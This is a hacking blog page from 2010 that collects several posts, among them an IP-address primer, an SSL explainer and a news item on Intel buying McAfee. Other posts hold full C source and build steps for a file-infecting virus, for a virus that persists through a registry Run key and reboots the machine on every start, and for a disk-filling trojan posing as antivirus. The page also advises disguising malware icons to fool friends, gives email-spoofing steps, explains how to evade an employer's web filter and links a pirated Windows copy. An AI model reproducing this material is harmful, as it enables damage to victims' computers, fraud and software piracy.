twitter
    Find out what I'm doing, Follow Me :)

Saturday, August 28, 2010

What are Private and Public IP Addresses


Private and Public IP AddressesInternet Protocol (IP) addresses are usually of two types: Public and Private. If you have ever wondered to know what is the difference between a public and a private IP address, then you are at the right place. In this post I will try to explain the difference between a public and a private IP addres in layman’s terms so that it becomes simple and easy to understand.
 

What are Public IP Addresses?

A public IP address is assigned to every computer that connects to the Internet where each IP is unique. Hence there cannot exist two computers with the same public IP address all over the Internet. This addressing scheme makes it possible for the computers to “find each other” online and exchange information. User has no control over the IP address (public) that is assigned to the computer. The public IP address is assigned to the computer by the Internet Service Provider as soon as the computer is connected to the Internet gateway.
A public IP address can be either static or dynamic. A static public IP address does not change and is used primarily for hosting webpages or services on the Internet. On the other hand a dynamic public IP address is chosen from a pool of available addresses and changes each time one connects to the Internet. Most Internet users will only have a dynamic IP assigned to their computer which goes off when the computer is disconnected from the Internet. Thus when it is re-connected it gets a new IP.
You can check your public IP address by visiting www.whatismyip.com
 

What are Private IP Addresses?

An IP address is considered private if the IP number falls within one of the IP address ranges reserved for private networks such as a Local Area Network (LAN). The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks (local networks):
10.0.0.0 – 10.255.255.255 (Total Addresses: 16,777,216)
172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)
192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)

Private IP addresses are used for numbering the computers in a private network including home, school and business LANs in airports and hotels which makes it possible for the computers in the network to communicate with each other. Say for example, if a network X consists of 10 computers each of them can be given an IP starting from 192.168.1.1 to 192.168.1.10. Unlike the public IP, the administrator of the private network is free to assign an IP address of his own choice (provided the IP number falls in the private IP address range as mentioned above).
Devices with private IP addresses cannot connect directly to the Internet. Likewise, computers outside the local network cannot connect directly to a device with a private IP. It is possible to interconnect two private networks with the help of a router or a similar device that supports Network Address Translation.
If the private network is connected to the Internet (through an Internet connection via ISP) then each computer will have a private IP as well as a public IP. Private IP is used for communication within the network where as the public IP is used for communication over the Internet. Most Internet users with a DSL/ADSL connection will have both a private as well as a public IP.
You can know your private IP by typing ipconfig command in the command prompt. The number that you see against “IPV4 Address:” is your private IP which in most cases will be 192.168.1.1 or 192.168.1.2. Unlike the public IP, private IP addresses are always static in nature.
Unlike what most people assume, a private IP is neither the one which is impossible to trace (just like the private telephone number) nor the one reserved for stealth Internet usage. In reality there is no public IP address that is impossible to trace since the protocol itself is designed for transperancy.

How to Detect Anonymous IP Addresses


Detect-ProxyAs the fraudsters are now becoming more sophisticated in bypassing the Geo-location controls by using proxies (Anonymous IPs) to spoof their IP address, it has become very much necessary to come up with a means for detecting the proxies so that the authenticity of the users can be verified. Using a proxy (web proxy) is the simplest and easiest way to conceal the IP address of an Internet user and maintain the online privacy. However proxies are more widely used by online fraudsters to engage in cyber crimes since it is the easiest way to hide their actual Geo-location such as city/country through a spoofed IP address. Following are some of the examples where fraudsters use the proxies to hide their actual IP.
 
1. Credit Card Frauds
For example, say a Nigerian fraudster tries to purchase goods online with a stolen credit card for which the billing address is associated with New York. Most credit card merchants use Geo-location to block orders from countries like Nigeria and other high risk countries. So in order to bypass this restriction the credit card fraudster uses a proxy to spoof his IP address so that it appears to have come from New York. The IP address location appears to be legitimate since it is in the same city as the billing address. A proxy check would be needed to flag this order.
 
2. Bypass Website Country Restrictions
Some website services are restricted to users form only a selected list of countries. For example, a paid survey may be restricted only to countries like United States and Canada. So a user from say China may use a proxy so as to make his IP appear to have come from U.S. so that he can earn from participating in the paid survey.
 

Proxy Detection Services

 
So in order to stop such online frauds, Proxy Detection has become a critical component. Today most companies, credit card merchants and websites that deal with e-commerce transactions make use of Proxy Detection Services like MaxMind and FraudLabs to detect the usage of proxy or spoofed IP from users participating online.
Proxy Detection web services allow instant detection of anonymous IP addresses. Even though the use of proxy address by users is not a direct indication of fraudulent behaviour, it can often indicate the intention of the user to hide his or her real IP. In fact, some of the most used ISPs like AOL and MSN are forms of proxies and are used by both good and bad consumers.
 
How Proxy Detection Works?
Proxy detection services often rely on IP addresses to determine whether or not the IP is a proxy. Merchants can obtain the IP address of the users from the HTTP header on the order that comes into their website. This IP address is sent to the proxy detecting service in real time to confirm it’s authenticity.
The proxy detection services on the other hand compare this IP against a known list of flagged IPs that belong to proxy services. If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy. These proxy detection services work continuously to grab a list or range of IPs that are commonly used for proxy services. With this it is possible to tell whether or not a given IP address is a proxy or spoofed IP.
 
How to Tell Whether a given IP is Real or a Proxy?
There are a few free sites that help you determine whether or not a given IP is a proxy. You can use free services like WhatisMyIPAddress to detect proxy IPs. Just enter the suspected IP in the field and click on “Lookup IP Address” button to check the IP address. If it is a suspected proxy then you will see the results something as follows.
Detect Anonymous Proxy
So for all those who think that they can escape by using a spoofed IP, this post is the answer. I hope this information helps. Pass your comments.

XSSer Storm - Open Source Penetration testing tool

XSSer Storm - Open Source Penetration testing tool

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

XSSer v0.6a aka "XSSer Storm!" supports this new features:
-g DORK Process search engine dork results as target urls
(ex:inurl:vulnerable.asp?id=)
--Ge=DORK_ENGINE Search engine to use for dorking (scroogle,
duck, altavista, bing)
-c CRAWLING Crawl target hierarchy parameters (can be slow!)
--Cw=CRAWLING_WIDTH Number of urls to visit when crawling
--Dfo Encodes fuzzing IP addresses in DWORD format

Download: http://xsser.sourceforge.net
You might also like:

Know More About Secure Sockets Layer (SSL)

Know More About Secure Sockets Layer (SSL)


Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.
 

What exactly is Secure Communication ?

 
Suppose there exists two communication parties A (client) and B (server).
 
Working of HTTP
When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between A and B , he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure
 
Now lets see the working of HTTPS
When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B‘s side. So even if the Hacker gains an unauthorised access to the ongoing communication between A and B he gets only the encrypted password (“xz54p6kd“) and not the original password. This is shown below
 

How is HTTPS implemented ?

 
HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses
  1. An SSL Certificate enables encryption of sensitive information during online transactions.
  2. Each SSL Certificate contains unique, authenticated information about the certificate owner.
  3. A Certificate Authority verifies the identity of the certificate owner when it is issued.
 
How Encryption Works ?
Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).
 
How to identify a Secure Connection ?
In Internet Explorer, you will see a lock icon Picture of the Lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.
So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations. Otherwise there are chances of Phishing using a Fake login Page.
I Hope this helps. Please pass your comments.

Intel to buy McAfee

Intel to buy McAfee for $7.68 billion


Intel plans to buy security company McAfee for $7.68 billion--the biggest acquisition in its 42-year history.
The chipmaker said Thursday it has entered into a definitive agreement to buy all of McAfee's common stock at $48 per share in cash. McAfee's stock closed Wednesday at $29.93, making Intel's offer a 60 percent premium.
The boards of both companies have approved the deal.
Security has become an essential element of online computing, on par with energy-efficient performance and connectivity, Intel said. But today's security isn't adequately addressing the array of new Net-connected machines on the market, such as mobile devices, TVs, cars, ATMs, and medical gadgets, according to Intel. Offering protection requires a new approach that can tie together software, hardware, and services, the company said.
Intel logo image
"With the rapid expansion of growth across a vast array of Internet-connected devices, more and more of the elements of our lives have moved online," Intel CEO Paul Otellini said in a statement. "In the past, energy-efficient performance and connectivity have defined computing requirements. Looking forward, security will join those as a third pillar of what people demand from all computing experiences."
By integrating McAfee's core technology, Intel asserts that it can improve current products and offer new ones that can better secure both the cloud and devices used by consumers and businesses. Those include traditional computers and embedded products--any device where chips play a prominent role.
"Our view is that everywhere we sell a microprocessor, there is an opportunity to sell security software with it," Otellini said in a conference call.
The chipmaker also sees the acquisition as augmenting its wireless strategy.
"Hardware-enhanced security will lead to breakthroughs in effectively countering the increasingly sophisticated threats of today and tomorrow," Renee James, Intel senior vice president, said in a statement. "This acquisition is consistent with our software and services strategy to deliver an outstanding computing experience in fast-growing business areas, especially around the move to wireless mobility."
The number of connected devices is expected to grow from around 1 billion today to 50 billion in another 10 years, according to McAfee CEO Dave DeWalt. This growth will reshape opportunities in communications and commerce, he said in a video presentation, but cybercriminals and cyberterrorists will also take advantage of the Net's open architecture, putting users at risk and jeopardizing the future of the Internet. Tackling next-generation cybersecurity is a key reason and motivation for Intel and McAfee to join forces, DeWalt said.
The merger stems in part from projects that Intel and McAfee have already been working on together. The two companies have been collaborating for the past 18 months on ways to improve security, James noted in the conference call.
"After working alongside each other and recognizing that we share a common vision for improving security, it made good sense that we take this step," James said.
The first product resulting from the team-up will be released in early 2011, James said, though she didn't reveal any details.
The deal also continues Intel's strategy of growing its business by using software to enhance its hardware, added James, citing the company's 2009 acquisition of Wind River Systems as just one example.
The deal is expected to close following McAfee shareholder approval and regulatory clearances, which Intel is hoping will occur before year's end. Once the acquisition is finalized, McAfee will operate as a wholly owned subsidiary, tied to Intel's Software and Services Group.
Intel noted the McAfee management team has promised to stay on for many years after the acquisition closes. Intel also said it's committed to the McAfee brand and all McAfee products.
In initial trading Thursday, McAfee stock was surging toward Intel's offer price, up about 57 percent to around $47.16, while Intel's own shares were trending down about 3 percent to the vicinity of $18.90. Intel said it expects the integration of McAfee to slightly dilute earnings during the first year of combined operations due to merger-related costs but then have little effect in the second year.
Although Intel is paying a 60 percent premium for McAfee over the stock's closing price from Wednesday, Intel noted the premium is in the range of recent large software and security transactions and is reasonable given McAfee's growth and profitability and the added value that Intel and McAfee can create together.
The Intel acquisition of McAfee illustrates the trend of security proliferating through all the layers of technology, said IDC analyst Chris Christiansen.
"I think this is a dramatic acceleration in the previous trend of security going from boxes to board to chips," he said. "Intel can bring economies of scale and advanced chip management to McAfee, and McAfee has technology in messaging, Web, encryption and DLP, areas that Intel can use in a variety of ways. It represents a shift in the security market of security into systems, chip and storage management and other disciplines."
The news also makes Christiansen wonder whether Symantec might not be next as an acquisition target.
"We are going to see more and more security companies absorbed into system management," he said, noting that "Microsoft consolidated security into its system management division."
The McAfee acquisition fits nicely with Intel's purchase last year of Wind River, McAfee Chief Technology Officer George Kurtz noted. Intel bought the maker of embedded-systems software for $884 million.
"Given the current challenges in dealing with the proliferation of virulent malware, bringing software closer to silicon will provide a real advantage for consumers and businesses. Beating back the tide of malware proliferation by changing the game on the bad guys is an exciting proposition," Kurtz said in a blog post.
"McAfee's strategy of protecting the multitude of devices such as ATMs, printers, digital copiers, and cars fits with helping organizations better manage and protect the IP enabled mobile and embedded devices that run Wind River embedded and mobile software," Kurtz said. "This also dovetails nicely with McAfee's acquisition of Solidcore, a leader in dynamic whitelisting technology that already provides protection for millions of embedded devices."
Intel had already announced an acquisition this week, saying it plans to buy Texas Instruments' cable modem unit to broaden the markets for its Atom processor line.
Here is a video from Intel about the McAfee acquisition:

Create your own Proxy Server instantly

Create your own Proxy Server instantly


Hello Friends,
Did I tell you I got a job at a very well known Company of India ( I cannot reveal the name since if I tell you then I will be violating the rules of that Company). Well it is one of the reasons for the reduction of my frequency in posting of latest hacking stuff. I had quite a lot of trouble in last few weeks with a company’s browsing restrictions. It used an extensive directory of ‘forbidden websites’ that kept out all but a few popular sites. In effect, no games sites, no personal email, and no Hacking Truths. But you don’t worry I have found out a way to break free.
None of the conventional proxy servers worked, and even Google Translate failed. My hopes were down until, yesterday, I discovered that one of my personal domains could be accessed.
Back on my home computer, in a matter of minutes, I had set up my own functioning proxy server. With the instructions below, so can you.

Prerequisites

If we want to pull this off there are a few things you need.
In theory, any webhost will do, if they comply with the other requirements; an old computer in your basement, or even a free online webhost.
  • PHP5 or greater and cURL
Look for this on the website of your webhost. If it’s paid hosting, you can almost count on it. Especially cURL is a feature that’ll be disabled on most free webservers.
  • Permission
That’s right. Some webhosts will explicitly forbid you to create a proxy server (or a chat room, for that matter) in their terms of content. And you can expect them to find out.

1. Download and Install GlypeProxy

GlypeProxy is a free, standalone PHP script. That means it’s lightweight and incredibly easy to configure. You can download it from their website.
Next, upload the files to a sub directory on your webserver. If you see a folder called ‘www’, or called after your domain name (e.g. domain.com) create the sub folder in there. You need to avoid using the word ‘proxy’, because some companies pick up on it. Instead, use ‘web’ or ’surf’.
There are a few different ways to upload your files. If you already know this, skip to the next paragraph. Here they are arranged from the least to the most effort.
  • Upload and unpack ZIP
Look in the filemanager for an ‘unpack’ or ‘extract’ option. You can then upload it in one take. This is not always supported.
  • FTP access
Use an FTP application to access your webhost, and let it transfer the files while you fetch some more coffee. Most often supported.
  • Manual upload
You really don’t want to do this – are you sure the previous two alternatives are blanked out? Your last resolve will be to manually upload all the files and folder structures. Or start looking for a different host – it might not be such a bad idea.

2. Ready For Use

There’s no real set-up needed. Just point your browser to the directory where you put all those files (ex. domain.com/surf) and GlypeProxy will pop up. If you don’t like the logo, you’ll have to replace it manually. But if you want a proxy server for personal use, some little branding won’t matter.
Users can enter any URL and, after expanding the options, choose to encode the URL, the page, allow cookies, scripts and objects. Encoding the page can help you access some sites that are still being picked up and intercepted, but might give you a corrupt webpage at times.

3. Admin Preferences

Although Glype is a powerful proxy script, the admin tools are obviously the backing power. You might not know this, but a lot of online proxy tools are powered by Glype, just like the one you just set up. The admin preferences leave room not only for customization, but for improvement. You can assign site-specific code for trouble-giving websites, and change user-agent and proxy lists.
Most useful to novice users will be the caching tools (pictured above), logs, and blacklists. The caching tools can help you improve the browsing speed by storing some files from all, or some of the already visited websites. Logs are off by default, but might have legal importance in the future, depending on who uses your proxy server. Always explicitly mention you’re keeping these logs. Finally, the blacklists will allow you to block (all but) a few sites, or users.
To access your admin panel, point your browser to admin.php on your webserver (e.g. domain.com/surf/admin.php).

Download Microsoft® Windows XP SP3 Corporate Student Edition August 2010

Download Microsoft® Windows XP SP3 Corporate Student Edition August 2010

Download Microsoft® Windows XP SP3 Corporate Student Edition August 2010

You do not need to use cracks and stuff, install and use if you have a licensed copy. This so-called "student" copy of XP, it is used for educational purposes and therefore it is designed for multiple installation without further contact with black-list Windows Genuine Advantage. This version of Windows XP SP3 does not require activation and is the official validation of Microsoft.

System Features:
- No need for any wga cracks with this one it passes online as fully Genuine.
- UXTheme applied,tcp ip = 16777215.
- All hotfixes integrated upto date August 2010.
- The new cd-key is slipstreamed into the CD so no need to put when installing.
- Default windows language ENGLISH/UK (Please change to your own language when installing).

Added Drivers:
- Driverpacks base 10.06
- MassStorage 10.06 txt mode (sata + raid)

Added Programs:
Framework all in one 1.1 - 4.0
Internet explorer 8
Windows media player 11
Directx 9 June 2010
Lclock 1.62b
Flash 10.1.82.76
Shockwave 11.5.7.609
Java 6 update 21
Foxit Reader 4.1.1
Winrar 3.93 regged
Firefox 4.0b1 (new)
Vlc media player 1.1.2 (new)
Kels runtimes 6.8.2
c++ 2005
c++ 2008
c++ 2010
Msn.Live.Messenger.9.0.14.0.8117.416 web-setup on desktop

REMOVED:
Music Samples
MSN Explorer
Windows Messenger 4.7
Tour
Folders: SUPPORT,VALUEADD,DOCS,WIN9XMIG,WIN9XUPG,WINNTUPG

How To Use:
Burn the image using the software you like.
CD is bootable.
Install as you would an original CD.

Download:


FileServe:

http://www.fileserve.com/file/7HjDDCU
http://www.fileserve.com/file/Y6DNV3f
http://www.fileserve.com/file/a6HUuxN
http://www.fileserve.com/file/HC3j4Qw

Send Fake Email – Fake Email Pranks

Send Fake Email – Fake Email Pranks

Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorised access. Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program which can be installed on your computer in few seconds. SMTP server allows you to send fake email right from your desktop easily and effectively. Download QK SMTP server HERE
 http://www.qksoft.com/qk-smtp-server/
. This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.
 
 
PART A: CONFIGURING SMTP SERVER
Once you have installed the QK SMTP server on your comp you must perform the following configuration.
1. Click on “Settings” button on the main screen,the Settings window pops up
2. On Settings window click on “Basic Parameter” tab
3. Set binding IP to “127.0.0.1″
4. Set port to “25″
 
PART B: SENDING FAKE EMAIL (EMAIL FORGING)
1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored
2. Goto command prompt(Start-Accessories-Command prompt)
3. Type exactly as follows
C:\>telnet 127.0.0.1 25
Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP server running on your own computer. This step is very importand to send fake email.
NOTE: The IP 127.0.0.1 should not be substituted by any other IP.
Heres the snapshot of what you see after step 3. Click on it to enlarge
4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below. Message within Green color is only explanation.
220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake email appears to have come from)
250 billg@microsoft.com Address Okay (Server gives a positive response)
rcpt to:admin@gmail.com (Type any valid recipient email address)
250 admin@gmail.com Address Okay (Server gives a positive response)
data (type this command to start input data)
354 Please start mail input
From:Gates <billg@microsoft.com>
To:admin@gmail.com
Date:Sat Jan 5,2008 9:45 PM
Subject:Test to send fake email
You can create as many headers followed by the “:” symbol.
NOTE: HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data
<HERE IS YOUR DATA>End the body of email by pressing [ENTER] .(dot) [ENTER]
250 Mail queued for delivery (Sever indicates that the email is ready for sending)
quit (Type this command to quit from server)
221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your fake email is sent to the recipient)

*****END OF EMAIL FORGING*****
Here’s the screenshot for your convenience
 

C Program Without a Main Function

How to write a C program without a main function?. Is it possible to do that. Yes there can be a C program without a main function. Here’s the code of the program without a main function…

 
#include<stdio.h>
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e) int begin()
{
printf(” hello “);
}
 
Does the above program run without the main function? Yes, the above program runs perfectly fine even without a main function. But how, whats the logic behind it? How can we have a C program working without main?
Here we are using preprocessor directive #define with arguments to give an impression that the program runs without main. But in reality it runs with a hidden main function.
The ‘##‘ operator is called the token pasting or token merging operator. That is we can merge two or more characters with it.
NOTE: A Preprocessor is program which processess the source code before compilation.
 
Look at the 2nd line of program -
#define decode(s,t,u,m,p,e,d) m##s##u##t
 
What is the preprocessor doing here. The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m,s,u & t into msut). The logic is when you pass (s,t,u,m,p,e,d) as argument it merges the 4th,1st,3rd & the 2nd characters(tokens).
 
Now look at the third line of the program -
#define begin decode(a,n,i,m,a,t,e)
 
Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e). According to the macro definition in the previous line the argument must be expanded so that the 4th,1st,3rd & the 2nd characters must be merged. In the argument (a,n,i,m,a,t,e) 4th,1st,3rd & the 2nd characters are ‘m’,'a’,'i’ & ‘n’.
So the third line “int begin” is replaced by “int main” by the preprocessor before the program is passed on for the compiler. That’s it…
The bottom line is there can never exist a C program without a main function. Here we are just playing a gimmick that makes us beleive the program runs without main function, but actually there exists a hidden main function in the program. Here we are using the proprocessor directive to intelligently replace the word begin” by “main”. In simple words int begin=int main.

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it

A Virus Program to Restart the Computer at Every Startup


Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.
#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.
 
Compiling The Scource Code Into Executable Virus.
 
1. Download the Source Code Here
http://www.mediafire.com/?lh55hoa96zzie1s2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, refer my post How to compile C Programs.
 
Testing And Removing The Virus From Your PC
 
You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
 
1. Reboot your computer in the SAFE MODE
2. Goto
X:\Windows\System
(X can be C,D,E or F) 3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

 There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
 
Logic Behind The Working Of The Virus
 
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.
 
LOGIC:
 
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
 
AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)
 
After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

How to Make a Trojan Horse

How to Make a Trojan Horse


How to Make a Trojan
Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…
Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.
 
Now lets move to the working of our Trojan
The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
 
The algorithm of the Trojan is as follows
1. Search for the root drive
2. Navigate to WindowsSystem32 on the root drive
3. Create the file named “spceshot.dll
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full
5. Once the drive is full, stop the process.
You can download the Trojan source code HERE. Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable.
 

How to compile, test and remove the damage?

 
Compilation:
compile  the  C Programs
Testing:
To test the Trojan,  just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.
NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
 
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
